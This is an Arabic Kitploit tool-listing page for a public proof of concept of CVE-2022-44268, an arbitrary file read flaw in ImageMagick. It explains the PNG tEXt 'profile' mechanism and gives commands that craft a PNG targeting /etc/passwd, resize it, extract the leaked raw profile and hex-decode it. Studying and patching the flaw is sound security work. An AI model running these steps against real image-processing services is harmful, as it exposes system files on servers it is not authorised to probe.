Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-44268 — PoC لقراءة الملفات العشوائية في ImageMagick | Kitploit
أدوات/GitHubGitHub/entr0pie/cve-2022-44268
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFالتعلم والتعليم
GitHubentr0pie/cve-2022-44268

CVE-2022-44268

PoC لقراءة الملفات العشوائية في ImageMagick

عرض المستودع
131منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-44268

يحتوي هذا المستودع على إثبات المفهوم (POC) لثغرة أمنية في ImageMagick (الإصدار 7.1.0-49)، وهي مكتبة مفتوحة المصدر واسعة الاستخدام لمعالجة الصور. تتيح هذه الثغرة للمهاجم تضمين محتوى ملف تعسفي داخل صورة تم تغيير حجمها عند قيام ImageMagick بتحليل ملف PNG.

الوصف

عندما يقوم ImageMagick بعمليات مثل تغيير الحجم على ملف PNG، فقد يتضمن محتوى ملف نظام، بشرط أن يكون للثنائي magick الأذونات اللازمة لقراءته. تنشأ هذه الثغرة بسبب سوء التعامل مع أجزاء النص داخل ملفات PNG.

يمكن للمهاجم استغلال هذه الثغرة عن طريق إنشاء ملف PNG أو استخدام ملف موجود وإضافة جزء نصي من النوع (tEXt). تتكون هذه الأجزاء من كلمة مفتاحية وسلسلة نصية. في هذه الحالة، إذا تطابقت الكلمة المفتاحية مع السلسلة "profile" (بدون علامات اقتباس)، فإن ImageMagick سيفسر السلسلة النصية المصاحبة كاسم ملف ويحاول تحميل محتواها كملف تعريف خام (raw profile). ونتيجة لذلك، عند تنزيل الصورة التي تم تغيير حجمها، ستحتوي على محتوى الملف البعيد الذي حدده المهاجم.

لمزيد من المعلومات، راجع هذه المقالة من MetabaseQ.

إثبات المفهوم

لاستغلال ImageMagick، قم بإنشاء ملف png خبيث:

root@kitploit:~
python3 CVE-2022-44268.py /etc/passwd  # Create output.png

ثم قم بتشغيل عملية تغيير الحجم باستخدام convert:

root@kitploit:~
convert output.png -resize 50% leak.png

أخيرًا، افحص الصورة المسرّبة وقم بتحويل Raw profile إلى نظام سداسي عشري (hex):

root@kitploit:~
identify -verbose leak.png
# ...
Raw profile type:

    2367
726f6f743a783a303a303a726f6f743a2f726f6f743a2f6269 [...]
root@kitploit:~
python -c "print(bytes.fromhex('726f6f743a783a303a303a726f6f743a2f726f6f743a2f6269 [...]'))"

ملاحظة: إثبات المفهوم هذا مخصص لأغراض تعليمية وإعلامية فقط. يرجى التأكد من أن لديك الأذونات والتفويض القانوني اللازمين قبل اختبار أو استخدام إثبات المفهوم هذا على أي نظام.

تنزيل الأداة